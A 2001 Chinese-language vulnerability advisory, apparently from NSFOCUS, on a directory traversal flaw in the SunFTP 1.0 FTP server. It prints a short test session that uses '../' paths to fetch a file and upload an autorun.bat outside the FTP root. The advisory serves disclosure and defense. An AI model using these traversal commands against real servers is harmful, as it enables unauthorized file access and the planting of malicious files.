发布日期：2001-03-09
更新日期：2001-03-09

受影响系统：

   Rasmus J.P. Allenheim SunFTP 1.0 Build 9

描述：

---

BUGTRAQ ID: 2428

SunFTP 是一个 FTP 服务器，它是免费软件，由 Rasmus J.P.
Allenheim 开发，并且与 Windows 平台相结合。

SunFTP 存有一个漏洞，这个漏洞使得 FTP 用户可以侵害服务
器。攻击者可以利用它在 FTP 根目录之外的目录上传或检索
文件。这使得攻击者，比如说，可以在系统上放置木马来控制
系统。


<* 来源：(se00020@lion.cc) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

  ftp> get ../sunftptest.txt
  200 Port command successful.
  150 Opening data connection for ../sunftptest.txt.
  226 File sent ok
  ftp> put
  Lokale Datei c:\test.txt
  Remotedatei ../autorun.bat

建议：

---

临时解决办法：

   NSFOCUS建议您换用别的替代产品，这个软件已不再受到技术支持。

厂商补丁：

   暂无


浏览次数：3583
严重程度：0（网友投票）